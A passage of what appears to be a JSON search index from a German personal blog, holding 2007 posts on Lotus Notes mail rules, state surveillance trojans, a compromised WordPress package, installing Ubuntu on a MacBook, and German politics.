gesehen.\nIch hatte mal einen User, der Mails mit dem Betreff oder Inhalt “Re” nicht angenommen hat und sich dann gewundert hat, daß er praktisch gar keine Nachrichten mehr bekommt. Durch die Regel, die ja auf Vorkommen (Contains) prüft, nimmt er dann auch keine Mails mehr an, die z.B. Realschule o.ä. enthält und das nicht nur im Betreff, sondern im kompletten Mailtext. :-)\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.eknori.de/archives/380\" target=\"_blank\"\u003eGet Rules From Users Mailfile auf\neknori.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eGet Rules From Users Mailfile Posted in Source Code by eknori on the\nFebruary 13th, 2007 (Visited 146 times) A few days ago I was asked to\ncreate a report about all rules in all mailfiles. The easiest way to do\nthis is to write an agent to examine the mailfiles. The result of this\nscan is stored in a Notes database. Put the following code into an agent\n( start: manually from menue, target: All Selected Documents )\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eUlrich hat hier einen coolen Code gepostet, um Mailregeln in einer extra\nNotes-Datenbank zu sammeln. Das sollte datenschutzrechtlich an sich\nunproblematisch sein und hilft bei Supportanfragen sicher weiter. Gerade\nbei den Mailregeln habe ich schon die lustigsten Kombinationen gesehen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-09-eknori-regeln-aus-user-mailfiles-sammeln/","title":"Eknori: Regeln aus User Mailfiles sammeln"},{"body":"Super-Close Google Maps Zooms :\nMit einem einfachen Trick kann man in Google Maps weiter zoomen, als die Software mit den GUI-Elementen möglich macht.\nGoogle Maps bietet als maximalen Zoomfaktor z=19, dieser kann aber über den Punkt “Link to this Page” in der Adresszeile des Browsers geändert werden. Ändert einfach den Faktor auf 20 bis 23. In manchen Gebieten ist schon viel früher Schluß, das meldet die Software aber mit: “We are sorry, but we don’t have imagery at this zoom level for this region.”\nAuf der Seite des Links oben sieht man verschiedene Wüstenbilder, die scheinbar aus Flugzeugüberflügen stammen.\nIch habe das mal am Münchner Marienplatz probiert, hier funktioniert ein Zoomfaktor von 21 und hier die Standard-Maximalauflösung mit http://maps.google.com/maps?f=q\u0026hl=en\u0026q=Marienplatz,+Germany\u0026layer=\u0026ie=UTF8\u0026sll=47.868495,12.356497\u0026sspn=0.003656,0.007381\u0026z=19\u0026ll=48.137085,11.575231\u0026spn=0.000909,0.002725\u0026t=k\u0026om=1 .\n","excerpt":"\u003cp\u003e\u003ca href=\"http://blog.outer-court.com/archive/2007-03-07-n12.html\" target=\"_blank\"\u003eSuper-Close\nGoogle Maps Zooms \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cp\u003eMit einem einfachen Trick kann man in Google Maps weiter zoomen, als die\nSoftware mit den GUI-Elementen möglich macht.\u003c/p\u003e\n\u003cp\u003eGoogle Maps bietet als maximalen Zoomfaktor z=19, dieser kann aber über\nden Punkt “Link to this Page” in der Adresszeile des Browsers geändert\nwerden. Ändert einfach den Faktor auf 20 bis 23. In manchen Gebieten ist\nschon viel früher Schluß, das meldet die Software aber mit: “We are\nsorry, but we don’t have imagery at this zoom level for this region.”\u003c/p\u003e\n\u003cp\u003eAuf der Seite des Links oben sieht man verschiedene Wüstenbilder, die\nscheinbar aus Flugzeugüberflügen stammen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-09-hochauflosende-bilder-mit-google-maps/","title":"Hochauflösende Bilder mit Google Maps"},{"body":"TP: Der Staat als Einbrecher: Heimliche Online-Durchsuchungen sind möglich :\nDer Staat als Einbrecher: Heimliche Online-Durchsuchungen sind möglich\nVolker Birk 03.03.2007\nDas Interesse des Staates, Telekommunikation von Kriminellen zur Aufklärung von schweren Straftaten überwachen zu können, ist legitim, auch im Rechtsstaat. Wenn Schwerverbrecher den Rechtsstaat ständig als Deckung für ihre Untaten missbrauchen, so möchte dieser sich irgendwann nicht mehr an der Nase herumführen lassen. Die Polizei möchte bei der Mafiabekämpfung und bei der Aufklärung von Straftaten von Extremisten nicht hilflos sein. Das ist sie aber auch ohne “Bundestrojaner” nicht.[…]\nSind wir wirklich schon so weit? Kann man in jeden Download über sogenannte Man-in-the-middle-Attacken Code einschleusen? Dies wird sicher ein Grund, Prüfsummen von Downloads zu überprüfen, allerdings gibt die Prüfsummen nicht jeder an, wenn er Dateien für Downloads zur Verfügung stellt.\nWie sieht es mit Systemupdates aus? Ubuntu Bei Ubuntu muss der Server vertrauenswürdig sein, von dem man seine Updates oder Installationspakete zieht, aber prüft die Software auch Prüfsummen? Apt-get arbeitet mit gpg-Schlüsseln und erkennt unsignierte Pakete, also meiner Meinung nach auch geänderte Pakete.\nIch denke das ist auch bei Debian so.\nMac OS und Windows Bisher hab ich keine genauen Daten zur Sicherheit der Updatemechanismen von Windows und Mac OS gefunden. Sobald ich was finde, liefere ich die Info nach!\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.heise.de/tp/r4/artikel/24/24766/1.html\" target=\"_blank\"\u003eTP: Der Staat als\nEinbrecher: Heimliche Online-Durchsuchungen sind möglich \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cp\u003eDer Staat als Einbrecher: Heimliche Online-Durchsuchungen sind möglich\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eVolker Birk 03.03.2007\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eDas Interesse des Staates, Telekommunikation von Kriminellen zur\nAufklärung von schweren Straftaten überwachen zu können, ist legitim,\nauch im Rechtsstaat. Wenn Schwerverbrecher den Rechtsstaat ständig als\nDeckung für ihre Untaten missbrauchen, so möchte dieser sich irgendwann\nnicht mehr an der Nase herumführen lassen. Die Polizei möchte bei der\nMafiabekämpfung und bei der Aufklärung von Straftaten von Extremisten nicht hilflos sein. Das ist sie aber auch ohne “Bundestrojaner”\nnicht.[…]\u003c/em\u003e\u003c/p\u003e\n\u003cp\u003eSind wir wirklich schon so weit? Kann man in jeden Download über\nsogenannte Man-in-the-middle-Attacken Code einschleusen? Dies wird\nsicher ein Grund, Prüfsummen von Downloads zu überprüfen, allerdings\ngibt die Prüfsummen nicht jeder an, wenn er Dateien für Downloads zur\nVerfügung stellt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-04-telepolis-heimliche-onlinedurchsuchungen/","title":"Telepolis: Heimliche Onlinedurchsuchungen"},{"body":"Nachdem ich das Update auf 2.1.1 letzte Woche noch verschoben hatte und durch die aktuellen News muß ich sagen, “Glück gehabt”, habe ich jetzt gleich auf 2.1.2 DE aktualisiert. Die Plugins funktionieren alle noch und auch sonst sehe ich noch keine großen Änderungen, weder im positiven, als auch im negativen Sinn.\n","excerpt":"\u003cp\u003eNachdem ich das Update auf 2.1.1 letzte Woche noch verschoben hatte und\ndurch die aktuellen News muß ich sagen, “Glück gehabt”, habe ich jetzt\ngleich auf 2.1.2 DE aktualisiert. Die Plugins funktionieren alle noch\nund auch sonst sehe ich noch keine großen Änderungen, weder im\npositiven, als auch im negativen Sinn.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-03-03-update-auf-wordpress-212-de/","title":"Update auf WordPress 2.1.2 DE"},{"body":"Wer in den letzten Tagen das Installationspaket von wordpress.org gezogen und installiert hat, sollte unbedingt auf 2.1.2 updaten, da ein Hacker das Paket ausgetauscht hat.\nhttp://wordpress.org/development/2007/03/upgrade-212/ http://blog.wordpress-deutschland.org … alp-traum/\nhttp://www.heise.de/newsticker/meldung/86167 ","excerpt":"\u003cp\u003eWer in den letzten Tagen das Installationspaket von wordpress.org\ngezogen und installiert hat, sollte unbedingt auf 2.1.2 updaten, da ein\nHacker das Paket ausgetauscht hat.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://wordpress.org/development/2007/03/upgrade-212/\" target=\"_blank\"\u003ehttp://wordpress.org/development/2007/03/upgrade-212/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://blog.wordpress-deutschland.org\" target=\"_blank\"\u003ehttp://blog.wordpress-deutschland.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.suchmaschinen-optimierung-seo.info/\" target=\"_blank\"\u003e… \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\nalp-traum/\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/86167\" target=\"_blank\"\u003ehttp://www.heise.de/newsticker/meldung/86167 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2007/2007-03-03-wordpress-211-installationspaket-kompromitiert/","title":"WordPress 2.1.1 Installationspaket kompromitiert"},{"body":"heise online – Umzugsmeldung per Computer :\nAdressenänderungen sollen künftig bundesweit vom heimischen Computer über das Internet erfolgen können. Von einer flächendeckenden Einführung der Online-Anmeldung verspricht sich das Bundesinnenministerium eine entscheidende Vereinfachung des Meldeverfahrens. Mit dem Aufbau eines zentralen Melderegisters will die Bundesregierung Länder und Kommunen entlasten. Das Projekt ist Teil des Programms “Zukunftsorientierte Verwaltung durch Innovation”, das vom Kabinett heute gebilligt wurde.\nSo kann man das natürlich auch sehen. Die Erleichterung und Innovation für den Bürger. Es heißt aber auch, daß die biometrischen Daten, die ja so harmlos sind, weil sie dezentral in den Meldeämtern liegen, auf einmal zentral in einer Datenbank vorgehalten werden und zur Vereinfachung auch von den Strafverfolgern simpelst genutzt werden können.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/86009\" target=\"_blank\"\u003eheise online –\nUmzugsmeldung per Computer \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eAdressenänderungen sollen künftig bundesweit vom heimischen Computer\nüber das Internet erfolgen können. Von einer flächendeckenden Einführung\nder Online-Anmeldung verspricht sich das Bundesinnenministerium eine\nentscheidende Vereinfachung des Meldeverfahrens. Mit dem Aufbau eines\nzentralen Melderegisters will die Bundesregierung Länder und Kommunen\nentlasten. Das Projekt ist Teil des Programms “Zukunftsorientierte\nVerwaltung durch Innovation”, das vom Kabinett heute gebilligt wurde.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eSo kann man das natürlich auch sehen. Die Erleichterung und Innovation\nfür den Bürger. Es heißt aber auch, daß die biometrischen Daten, die ja\nso harmlos sind, weil sie dezentral in den Meldeämtern liegen, auf\neinmal zentral in einer Datenbank vorgehalten werden und zur\nVereinfachung auch von den Strafverfolgern simpelst genutzt werden\nkönnen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-02-28-heise-online-umzugsmeldung-per-computer/","title":"heise online: Umzugsmeldung per Computer"},{"body":"Die wunderbare Welt von Isotopp Ich glaube nicht, das man den Blödsinn des Bundestrojaners mit all seinen Facetten besser erklären und für unsinnig hinstellen kann.\nDanke und weiter so!\n","excerpt":"\u003cp\u003e\u003ca href=\"http://blog.koehntopp.de/archives/1600-Der-Bundestrojaner-durchdekliniert.html\" target=\"_blank\"\u003eDie\nwunderbare Welt von Isotopp \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eIch glaube nicht, das man den Blödsinn des Bundestrojaners mit all\nseinen Facetten besser erklären und für unsinnig hinstellen kann.\u003c/p\u003e\n\u003cp\u003eDanke und weiter so!\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-02-27-der-bundestrojaner-zerlegt/","title":"Der Bundestrojaner zerlegt"},{"body":"Diesen Brief kann ich nur unterstützen.\nLinks:\nhttp://www.heise.de/newsticker/meldung/8586 http://www.get-privacy.info/?p=354 … -in-den-Ofen.html\n","excerpt":"\u003cp\u003eDiesen Brief kann ich nur unterstützen.\u003c/p\u003e\n\u003cp\u003eLinks:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/8586\" target=\"_blank\"\u003ehttp://www.heise.de/newsticker/meldung/8586 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.get-privacy.info/?p=354\" target=\"_blank\"\u003ehttp://www.get-privacy.info/?p=354 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://blog.kairaven.de/\" target=\"_blank\"\u003e… \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n-in-den-Ofen.html\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ol\u003e","ref":"https://stoeps.de/posts/2007/2007-02-26-get-privacy-offener-brief-an-bundesdatenschutzbeauftragten-schaar/","title":".get-privacy: Offener Brief an Bundesdatenschutzbeauftragten Schaar"},{"body":"Eine ziemlich interessante Seite über vernachlässigte Themen in Deutschland, bzw. International.\nInitiative Nachrichtenaufklärung\nEs stimmt wirklich, alles Themen, über die ich mir auch schon meine Gedanken gemacht habe, aber durch fehlende Informationen nie weiter hinterfragt habe.\nErschreckend z.B. das Internet als Großstromverbraucher und die Bonitätsprüfung habe ich zwar selbst noch nicht gespürt, aber einige meiner Bekannten haben bereits Probleme durch diesen Mist.\n","excerpt":"\u003cp\u003eEine ziemlich interessante Seite über vernachlässigte Themen in\nDeutschland, bzw. International.\u003c/p\u003e\n\u003cp\u003eInitiative Nachrichtenaufklärung\u003c/p\u003e\n\u003cp\u003eEs stimmt wirklich, alles Themen, über die ich mir auch schon meine\nGedanken gemacht habe, aber durch fehlende Informationen nie weiter\nhinterfragt habe.\u003c/p\u003e\n\u003cp\u003eErschreckend z.B. das Internet als Großstromverbraucher und die\nBonitätsprüfung habe ich zwar selbst noch nicht gespürt, aber einige\nmeiner Bekannten haben bereits Probleme durch diesen Mist.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-02-26-interessante-seite-uber-vernachlassigte-themen/","title":"Interessante Seite über vernachlässigte Themen"},{"body":"CCC | CCC warnt vor biometrischer Vollerfassung :\nObwohl das BMI stets versicherte, dass es keine zentrale Speicherung der biometrischen Daten geben wird, hat am Freitag der Bundesrat gefordert, sowohl die Gesichtsbilder als auch die Fingerabdrücke der Bürger in einer zentralen Datenbank für immer zu speichern. Bevor die Fingerabdrücke an den Meldeämtern überhaupt abgeben werden müssen, steht die zentrale Datenbank bereits vor der Tür.\nDer CCC betont, dass die Speicherung in einer zentralen Datenbank ein Risiko für die Sicherheit der sensiblen biometrischen Daten darstellt. Diese zentrale Erfassung bietet deutlich einfachere Zugriffsmöglichkeiten für Datenverbrecher.\nEs ist wirklich ein Witz, für wie dumm uns die Politik verkaufen will. Wir driften hier in eine Totalüberwachung, die mit Gesichtsabgleich bei der Autobahnmaut enden wird. Dann kann man nämlich auch gleich noch sagen wer, mit was, wohin fährt. Das ist mindestens so interessant, wie die Speicherung von Kommunikationsdaten.\nBruce Schneier sagte mal, daß wir auch Drogen und Waffen nicht aus Gefängnissen verbannen können und trotzdem bilden wir uns ein, daß wir mit hohem technischem Aufwand, Flüge und unsere Länder absichern können. Er hat meiner Meinung nach Recht, es werden immer mehr Unschuldige von der Polizei und anderen Behörden zu Verdächtigen.[\n]1 ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.ccc.de/updates/2007/biometrie-datenbank\" target=\"_blank\"\u003eCCC | CCC warnt vor\nbiometrischer Vollerfassung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eObwohl das BMI stets versicherte, dass es keine zentrale Speicherung der\nbiometrischen Daten geben wird, hat am Freitag der Bundesrat gefordert,\nsowohl die Gesichtsbilder als auch die Fingerabdrücke der Bürger in\neiner zentralen Datenbank für immer zu speichern. Bevor die\nFingerabdrücke an den Meldeämtern überhaupt abgeben werden müssen, steht\ndie zentrale Datenbank bereits vor der Tür.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDer CCC betont, dass die Speicherung in einer zentralen Datenbank ein\nRisiko für die Sicherheit der sensiblen biometrischen Daten darstellt.\nDiese zentrale Erfassung bietet deutlich einfachere\nZugriffsmöglichkeiten für Datenverbrecher.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eEs ist wirklich ein Witz, für wie dumm uns die Politik verkaufen will.\nWir driften hier in eine Totalüberwachung, die mit Gesichtsabgleich bei\nder Autobahnmaut enden wird. Dann kann man nämlich auch gleich noch\nsagen wer, mit was, wohin fährt. Das ist mindestens so interessant, wie\ndie Speicherung von Kommunikationsdaten.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-02-25-biometrische-vollerfassung/","title":"CCC warnt vor \"Biometrischer Vollerfassung\""},{"body":"Ich habe diese Woche Ubuntu Feisty Fawn auf mein MacBook Core2Duo installiert. Die Anleitung im Ubuntuwiki ist sehr gut, bei mir gab es aber Probleme beim Bootmanager und der WLAN-Karte.\nIm Wiki heißt es unter Punkt 6, daß dieser Punkt unter Ubuntu 7.04 nicht mehr notwendig ist. Bei mir funktionierte es nur nach Installation von Refit und dem Aufruf wie im Wiki beschrieben, um Platte und MBR zu synchronisieren.\nDie Wlan-Karte ist eine Atheros AR5418, funktioniert aber unter ndiswrapper sehr gut, auch mit wpa-Verschlüsselung.\nIch habe ndiswrapper aus den Sourcen übersetzt, ich nutze jetzt 1.37 und bin nach folgender Anleitung vorgegangen. Den Windows-Treiber bei Lenovo herunterladen und z.B. mit wine entpacken.\nsudo ndiswrapper -i ~/.wine/drive_c/DRIVERS/WIN/WLLANATH/WINXP_2K/NET5416.INF\nausführen und dann noch sudo ndiswrapper -m und sudo modprobe ndiswrapper\nUPDATE 8. März 2007\nAktuelle Infos zum Stand des Madwifi-Treibers findet ihr hier:\nhttp://madwifi.org/ticket/1001 ","excerpt":"\u003cp\u003eIch habe diese Woche Ubuntu Feisty Fawn auf mein MacBook Core2Duo\ninstalliert. Die Anleitung im Ubuntuwiki ist sehr gut, bei mir gab es\naber Probleme beim Bootmanager und der WLAN-Karte.\u003c/p\u003e\n\u003cp\u003eIm Wiki heißt es unter Punkt 6, daß dieser Punkt unter Ubuntu 7.04 nicht\nmehr notwendig ist. Bei mir funktionierte es nur nach Installation von\nRefit und dem Aufruf wie im Wiki beschrieben, um Platte und MBR zu\nsynchronisieren.\u003c/p\u003e\n\u003cp\u003eDie Wlan-Karte ist eine Atheros AR5418, funktioniert aber unter\nndiswrapper sehr gut, auch mit wpa-Verschlüsselung.\u003c/p\u003e\n\u003cp\u003eIch habe ndiswrapper aus den Sourcen übersetzt, ich nutze jetzt 1.37 und\nbin nach folgender Anleitung vorgegangen. Den Windows-Treiber bei Lenovo\nherunterladen und z.B. mit wine entpacken.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-02-22-ubuntu-on-macbook/","title":"Ubuntu on Macbook"},{"body":"Am 14. und 15.2.07 war die jährliche Veranstaltung der Fa. Edcom, IBM und Volker Weber in München – die Lotusphere Nachlese 2007.\nDie Keynote sprach wie letztes Jahr Ron Sebastian. In der Keynote wurde eine Livedemo von Lotus Notes 8, Sametime 7.5, Notes Connections, Notes Activities und Quickr vorgestellt. Die Programme sind zum großen Teil noch im Beta 1 Stadium, sehen aber super aus und versprechen ein komplett neues Arbeiten mit Notes.\nDie Socialnetworking Erweiterungen scheinen sehr durchdacht und ich denke, daß man v.a. in größeren Firmen mit vielen Standorten eine spürbare Verbesserung in der Produktivität erwarten kann.\nEin sehr interessanter Vortrag von Volker Weber war die Sicherheit von mobilen Endgeräten. Mich hat v.a. überrascht, wie wenig Sicherheit ein Kensington Lock mit sich bringt. Volker hat mir gezeigt, daß nicht immer die Technik die Lösung für Probleme ist.\nDie Entwicklersessions habe ich nicht besucht, aber die Admin-Sessions von Alexander Staat, Alex Noack und Thomas Gumz waren super!\nDie Strategie Sessions von Ralph Siepmann waren hochinteressant. Er erklärte wie die neuen socialnetworking Produkte Dogear, Bluepages und Notes_Connections bei IBM bereits jetzt eingesetzt werden und in wie weit socialnetworking auch in Firmen Vorteile bringen kann.\nIch kann nur jedem empfehlen die Veranstaltung nächstes Jahr nicht zu verpassen. Ich habe wieder viel gelernt.\nHier noch Impressionen von Volker Weber.\n","excerpt":"\u003cp\u003eAm 14. und 15.2.07 war die jährliche Veranstaltung der Fa. Edcom, IBM\nund Volker Weber in München – die Lotusphere Nachlese 2007.\u003c/p\u003e\n\u003cp\u003eDie Keynote sprach wie letztes Jahr Ron Sebastian. In der Keynote wurde\neine Livedemo von Lotus Notes 8, Sametime 7.5, Notes Connections, Notes\nActivities und Quickr vorgestellt. Die Programme sind zum großen Teil\nnoch im Beta 1 Stadium, sehen aber super aus und versprechen ein\nkomplett neues Arbeiten mit Notes.\u003c/p\u003e\n\u003cp\u003eDie Socialnetworking Erweiterungen scheinen sehr durchdacht und ich\ndenke, daß man v.a. in größeren Firmen mit vielen Standorten eine\nspürbare Verbesserung in der Produktivität erwarten kann.\u003c/p\u003e\n\u003cp\u003eEin sehr interessanter Vortrag von Volker Weber war die Sicherheit von\nmobilen Endgeräten. Mich hat v.a. überrascht, wie wenig Sicherheit ein\nKensington Lock mit sich bringt. Volker hat mir gezeigt, daß nicht immer\ndie Technik die Lösung für Probleme ist.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-02-17-lotusphere-comes-to-you-2007/","title":"Lotusphere comes to you 2007"},{"body":"Der Bundesgerichtshof hat heute meiner Meinung nach richtig entschieden. Eine heimliche Durchsuchung von Computern ist demnach unzulässig.\nInteressant sind allerdings die Reaktionen auf dieses Urteil. Bundesinnenminister Schäuble und Bundesgeneralstaatsanwältin Monika Harms fordern Gesetzesänderungen , um mit den Islamisten, die ihre Straftaten im Internet planen Schritt halten zu können.\nDass die Leute keine Ahnung von Technik haben, sieht man damit auf den ersten Blick. Ich halte die Einstellung mit meinem rechtsstaatlichen Verständnis für fehlerhaft, aber von der technischen Durchführung halte ich sie für unmöglich.\nWas hilft mir eine Onlinedurchsuchung in folgenden Fällen:\nDer Terrorist befindet sich in einem Internetcafé?\nDer Terrorist / Verdächtige benutzt nicht Windows?\nDer zu durchsuchende Computer hängt hinter einer Firewall? Hat eine Personal Firewall installiert?\n…\nDas zu erwartende Gesetz wird uns vor keiner Straftat schützen! Es werden nur unsere Rechte beschnitten. Ich sehe zwar für Linux und BSD (FreeBSD , NetBSD oder OpenBSD ) einen positiven Trend, da es damit noch mehr Gründe geben wird, auf diese OS umzusteigen, oder glauben die Herren / Damen, daß Sie alle Betriebssysteme verseuchen können?\nWie stellt man sich das vor? Alle Computer in Deutschland prophylaktisch mit Trojanern verseuchen? Macht der BKA-Trojaner an der Landesgrenze halt?\nWie viele der beschlossenen Internetgesetze absolut hirnrissig!\nUpdate:\nMir fällt noch eine Möglichkeit ein: Bilden wir unsere Polizei als Hacker aus! Das könnte höchstens mit dem neuen Hackerparagraph in Konflikt geraten, damit könnte nämlich der Besitz von Hackertools strafbar werden!\n","excerpt":"\u003cp\u003eDer Bundesgerichtshof hat heute meiner Meinung nach richtig entschieden.\nEine\n\u003ca href=\"http://netzpolitik.org/2007/bgh-heimliche-online-durchsuchungen-sind-unzulaessig/?from=feed\" target=\"_blank\"\u003eheimliche\nDurchsuchung von Computern \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n ist demnach unzulässig.\u003c/p\u003e\n\u003cp\u003eInteressant sind allerdings die Reaktionen auf dieses Urteil.\n\u003ca href=\"http://www.sueddeutsche.de/deutschland/artikel/794/100694/\" target=\"_blank\"\u003eBundesinnenminister\nSchäuble und Bundesgeneralstaatsanwältin Monika Harms fordern\nGesetzesänderungen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, um mit den Islamisten, die ihre Straftaten im\nInternet planen Schritt halten zu können.\u003c/p\u003e\n\u003cp\u003eDass die Leute keine Ahnung von Technik haben, sieht man damit auf den\nersten Blick. Ich halte die Einstellung mit meinem rechtsstaatlichen\nVerständnis für fehlerhaft, aber von der technischen Durchführung halte\nich sie für unmöglich.\u003c/p\u003e\n\u003cp\u003eWas hilft mir eine Onlinedurchsuchung in folgenden Fällen:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003eDer Terrorist befindet sich in einem Internetcafé?\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-02-05-bgh-bundestrojaner-ist-unzulassig/","title":"BGH: Bundestrojaner ist unzulässig"},{"body":"Quelle: http://www.heute.de/ZDFheute/…00.html Interessant! Gestern sprach sich unsere Bundeskanzlerin noch gegen eine Höchstgeschwindigkeit auf Autobahnen aus und heute empfiehlt sie uns nicht immer Vollgas zu fahren.\nWie schon bei den Gaslieferungsproblemen sieht sie als Lösung den Atomausstieg rückgängig zu machen. Wir sollen weiter Atomstrom produzieren, da er kein CO2 ausstößt.\nBei immer mehr Diskussionen sehe ich starke Einflüsse von Lobbies. Es ist bei uns inzwischen ähnlich schlimm wie in den USA.\nEs ist klar, daß immer eine Interessengruppe den kürzeren Strohhalm zieht. Aber heißt das, daß wir gar keine Änderung in unser System einfliessen lassen können?\nVertreter und Geschäftleute sind gegen ein Tempolimit, da sie dann nicht mehr so schnell von Termin zu Termin kommen. Große Stromverbraucher sind gegen teureren Strom. Die Atombefürworter halten an ihrem Geschäft fest …\nLaut UNO Klimabericht muss sich was ändern und zwar bald! Wir werden einen Weg finden müssen und vielen Leuten wird auf die Zehen gestiegen werden, daber es muss sein.\n\u0026lt; sarkasmus\u0026gt;Im Datenschutz haben wir uns an den Ausverkauf unserer Rechte bereits gewohnt, wir haben schließlich nichts zu verbergen und es hilft der Terrorismusabwehr.\nVielleicht wird es aber auch nicht so schlimm. Exxon und andere Lobbiesten bezahlen schließlich bereits Kopfgeld für wissenschaftliche Artikel, die den UNO-Bericht wiedersprechen .\n","excerpt":"\u003cp\u003eQuelle:\n\u003ca href=\"http://www.heute.de/ZDFheute/inhalt/12/0,3672,4343692,00.html\" target=\"_blank\"\u003ehttp://www.heute.de/ZDFheute/…00.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eInteressant! Gestern sprach sich unsere Bundeskanzlerin noch\n\u003ca href=\"http://www.heute.de/ZDFheute/inhalt/18/0,3672,4343250,00.html\" target=\"_blank\"\u003egegen eine\nHöchstgeschwindigkeit \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n auf Autobahnen aus und heute empfiehlt sie uns\nnicht immer Vollgas zu fahren.\u003c/p\u003e\n\u003cp\u003eWie schon bei den Gaslieferungsproblemen sieht sie als Lösung den\n\u003ca href=\"http://www.spiegel.de/wirtschaft/0,1518,458547,00.html\" target=\"_blank\"\u003eAtomausstieg\nrückgängig \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zu machen. Wir sollen weiter Atomstrom produzieren, da er\nkein CO2 ausstößt.\u003c/p\u003e\n\u003cp\u003eBei immer mehr Diskussionen sehe ich starke Einflüsse von Lobbies. Es\nist bei uns inzwischen ähnlich schlimm wie in den USA.\u003c/p\u003e\n\u003cp\u003eEs ist klar, daß immer eine Interessengruppe den kürzeren Strohhalm\nzieht. Aber heißt das, daß wir gar keine Änderung in unser System\neinfliessen lassen können?\u003c/p\u003e\n\u003cp\u003eVertreter und Geschäftleute sind gegen ein Tempolimit, da sie dann nicht\nmehr so schnell von Termin zu Termin kommen. Große Stromverbraucher sind\ngegen teureren Strom. Die Atombefürworter halten an ihrem Geschäft fest\n…\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-02-04-zdf-heute-merkel-sparsam-auto-fahren/","title":"ZDF Heute: \"Merkel: Sparsam Auto fahren\""},{"body":"Schon irgendwie witzig. Die Tagesschau meldet heute , daß die DB mehr Geld für neue Züge ausgeben möchte. Herr Mehdorn fordert von der Bundesregierung sogar mehr Geld, da bereits alle zugewiesenen Mittel verplant sind.\nMeiner Meinung nach liegt der Geldmangel der Bahn u.a. daran, daß noch benutzbare Züge verschrottet werden , um Konkurrenten gar nicht erst auf die Idee kommen zu lassen, daß man mit den alten Interregios ins Geschäft einsteigen könnte. Die Interregios wurden von Steuergelder bezahlt! Genau wie die jetzt angekündigten neuen Züge und dann verschrottet, anstatt sie an ausländische oder inländische Bahngesellschaften zu verkaufen.\nAuf diese Aktion hin noch mehr Geld zu fordern halte ich für unverschämt.\nhttp://www.diedrei.org/Heft_7_06/05%20Brennpunkt%20Bahn.pdf Deutsche Bahn Bahn für Alle Attac ","excerpt":"\u003cp\u003eSchon irgendwie witzig. Die \u003ca href=\"http://www.tagesschau.de\" 